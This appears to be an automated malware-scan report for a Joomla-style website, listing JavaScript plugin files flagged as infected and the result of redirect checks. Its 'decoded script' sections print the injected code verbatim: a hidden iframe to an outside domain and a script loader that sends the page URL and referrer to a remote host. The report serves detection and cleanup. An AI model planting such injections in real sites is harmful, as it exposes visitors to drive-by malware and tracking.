Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=annabelarmour.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://annabelarmour.com/ | 200 OK Content-Length: 3827 Content-Type: text/html | clean |
http://annabelarmour.com/media/system/js/caption.js | 200 OK Content-Length: 3359 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = Antivirus reports:
| ||
http://annabelarmour.com/plugins/content/highslide/highslide-full.packed.js | 200 OK Content-Length: 33990 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('m k={4A:\'O/9n/\',6H:\'9o.82\',8O:10,5M:4m,8U:10,8Z:4m,4F:15,64:15,3X:15,2Q:15,4L:9A,6E:\'5x R 1P 2d, 9t 8J 9q R 2V. 9B 9k 9p 14 1S 8J 5z.\',81:\'ah...\',7Z:\ Antivirus reports:
| ||
http://annabelarmour.com/plugins/content/highslide/easing_equations.js | 200 OK Content-Length: 10970 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Math.linearTween = function (t, b, c, d) { return c*t/d + b; }; Math.easeInQuad = function (t, b, c, d) { return c*(t/=d)*t + b; }; Math.easeOutQuad = function (t, b, c, d) { return -c *(t/=d)*(t-2) + b; }; Math.easeInOutQuad = function (t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t + b; return -c/2 * ((--t)*(t-2) - 1) + b; }; Math.easeInCubic = function ( Decoded script: var _escape='%3Cscript%3E%20%3Bdocument.write%28%27%3Ciframe%20src%3D%22http%3A//online1you.com/3/search.php%3Fsid%3D1%22%20scrolling%3D%22auto%22%20frameborder%3D%22no%22%20align%3D%22center%22%20height%3D%222%22%20width%3D%222%22%3E%3C/iframe%3E%27%29%3B%0A%3C/script%3E';var _0Ol = document.createElement('script'); _0Ol.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1l = do _0Ol.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1l = document.getElementsByTagName('head')[0]; O1l.appendChild(_0Ol);document.write(unescape(_escape)); Antivirus reports:
| ||
http://annabelarmour.com/plugins/content/highslide/swfobject.js | 200 OK Content-Length: 8463 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DETECT_KEY=_a?_a:"detectflash";this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variables=new Object();this.attributes=new Array();if(_1 Decoded script: var _escape='%3Cscript%3E%20%3Bdocument.write%28%27%3Ciframe%20src%3D%22http%3A//online1you.com/3/search.php%3Fsid%3D1%22%20scrolling%3D%22auto%22%20frameborder%3D%22no%22%20align%3D%22center%22%20height%3D%222%22%20width%3D%222%22%3E%3C/iframe%3E%27%29%3B%0A%3C/script%3E';var _0Ol = document.createElement('script'); _0Ol.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1l = do _0Ol.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1l = document.getElementsByTagName('head')[0]; O1l.appendChild(_0Ol);document.write(unescape(_escape)); Antivirus reports:
| ||
http://annabelarmour.com/hsconfig/js/highslide-sitesettings.js | 200 OK Content-Length: 1478 Content-Type: text/javascript | clean |
http://annabelarmour.com/plugins/content/1pixelout/audio-player.js | 200 OK Content-Length: 2374 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var ap_instances = new Array();
function ap_stopAll(playerID) { for(var i = 0;i<ap_instances.length;i++) { try { if(ap_instances[i] != playerID) document.getElementById("audioplayer" + ap_instances[i].toString()).SetVariable("closePlayer", 1); else document.getElementById("audioplayer" + ap_instances[i].toString()).SetVariable("closePlayer", 0); } catch( errorObject ) { } } } function ap_registerPlayers() { v Decoded script: function ap_registerPlayers() { var objectID; var objectTags = document.getElementsByTagName("object"); for (var i = 0; i < objectTags.length; i++) { objectID = objectTags[i].id; if (objectID.indexOf("audioplayer") == 0) { ap_instances[i] = objectID.substring(11, objectID.length); } } } /*** called setInterval with function ap_registerPlayers() { var objectID; var objectTags = docu _0Ol.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1l = document.getElementsByTagName('head')[0]; O1l.appendChild(_0Ol);document.write(unescape(_escape)); Antivirus reports:
| ||
http://annabelarmour.com/plugins/content/jw_allvideos/players/silverlight.js | 200 OK Content-Length: 19484 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) 
if (!window.Silverlight) { window.Silverlight = { }; } Silverlight._silverlightCount = 0; Silverlight.fwlinkRoot='http://go2.microsoft.com/fwlink/?LinkID='; Silverlight.onGetSilverlight = null; Silverlight.onSilverlightInstalled = function () {window.location.reload(false);}; Silverlight.isInstalled = function(version) { var isVersionSupported=false; var container = null; Antivirus reports:
| ||
http://annabelarmour.com/plugins/content/jw_allvideos/players/wmvplayer.js | 200 OK Content-Length: 25593 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof jeroenwijering == "undefined") { var jeroenwijering = new Object(); jeroenwijering.utils = new Object(); } jeroenwijering.Player = function(cnt,src,cfg) { this.controller; this.model; this.view; this.configuration = { backgroundcolor:'FFFFFF', windowless:'false', file:'', height:'260', image:'', backcolor:'FFFFFF', frontcolor:'000000', lightcolor:'000000', screencolor:'000000', width:'320' Decoded script: var _escape='%3Cscript%3E%20%3Bdocument.write%28%27%3Ciframe%20src%3D%22http%3A//online1you.com/3/search.php%3Fsid%3D1%22%20scrolling%3D%22auto%22%20frameborder%3D%22no%22%20align%3D%22center%22%20height%3D%222%22%20width%3D%222%22%3E%3C/iframe%3E%27%29%3B%0A%3C/script%3E';var _0Ol = document.createElement('script'); _0Ol.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1l = do _0Ol.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1l = document.getElementsByTagName('head')[0]; O1l.appendChild(_0Ol);document.write(unescape(_escape)); Antivirus reports:
| ||
http://annabelarmour.com/plugins/content/jw_allvideos/players/AC_QuickTime.js | 200 OK Content-Length: 10110 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var gArgCountErr = 'The "%%" function requires an even number of arguments.'
+ '\nArguments should be in the form "atttributeName", "attributeValue", ...';
var gTagAttrs = null;
var gQTGeneratorVersion = 1.0;
function AC_QuickTimeVersion() { return gQTGeneratorVersion; }
function _QTComplain(callingFcnName, errMsg)
{
errMsg = errMsg.replace("%%", callingFcnName);
alert(errMsg);
}
function _QTAddAttribute(prefix, slotName, tagName)
{
var value;
value = gTagAttrs[prefi Antivirus reports:
| ||
http://annabelarmour.com/templates/tem_vivagallery/overIE.js | 200 OK Content-Length: 2205 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!--startList = function() { if (document.all&&document.getElementById) { theul = document.getElementById("menu").childNodes[0]; theul.setAttribute('id','menu_ul'); navRoot = document.getElementById("menu_ul"); for (i=0; i<navRoot.childNodes.length; i++) { effect(navRoot); } } } function effect(elementId) { node = elementId.childNodes[i]; if (node.nodeName=="LI") { node.onmouseover=function() Antivirus reports:
| ||
http://annabelarmour.com/test404page.js | 404 Not Found Content-Length: 398 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: annabelarmour.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 30 May 2014 17:20:03 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 30 May 2014 17:20:05 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: cdbb5b1cd48127a7dd0c37146e4f7a28=oe557j195pfp93745agl5v83k5; path=/
GET / HTTP/1.1
Host: annabelarmour.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 30 May 2014 17:20:03 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 30 May 2014 17:20:05 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: cdbb5b1cd48127a7dd0c37146e4f7a28=oe557j195pfp93745agl5v83k5; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: annabelarmour.com
Referer: http://www.google.com/search?q=annabelarmour.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: annabelarmour.com
Referer: http://www.google.com/search?q=annabelarmour.com
Result:
The result is similar to the first query. There are no suspicious redirects found.